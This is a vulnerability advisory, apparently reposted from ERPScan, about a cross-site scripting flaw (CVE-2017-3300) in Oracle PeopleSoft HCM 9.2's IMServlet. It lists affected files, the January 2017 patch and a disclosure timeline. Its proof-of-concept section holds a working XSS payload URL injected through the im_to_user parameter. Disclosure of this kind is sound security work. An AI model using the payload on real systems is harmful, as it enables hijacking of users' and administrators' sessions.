Oracle PeopleSoft HCM 9.2 Cross Site Scripting Vulnerability

Application: Oracle PeopleSoft

Vendor: Oracle

Bugs: XXS

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Authors: Vahagn Vardanyan, Dmitry Yudin



1. ADVISORY INFORMATION

Title: Oracle PeopleSoft a XSS vulnerability

Advisory ID: [ERPSCAN-17-005]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle



2. VULNERABILITY INFORMATION

Class: XSS [CWE-79]

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2017-3300

CVSS Base Score: 6.1



3. VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of
administrators or users.



4. VULNERABLE PACKAGES


$ psreleaseinfo

ToolsRelease: 8.55.03

ToolsReleaseDB: 8.55



PeopleSoft HCM 9.2



PORTAL.war/WEB-INF/lib/mcfIM.jar



$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar

36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar



5. SOLUTIONS AND WORKAROUNDS

Oracle CPU January 2017


6. AUTHOR


Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13 )/ERPScan



7. TECHNICAL DESCRIPTION



7.1. Proof of Concept



xss


http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E



8. REPORT TIMELINE

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017



9. REFERENCES

http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

#  0day.today [2018-01-01]  #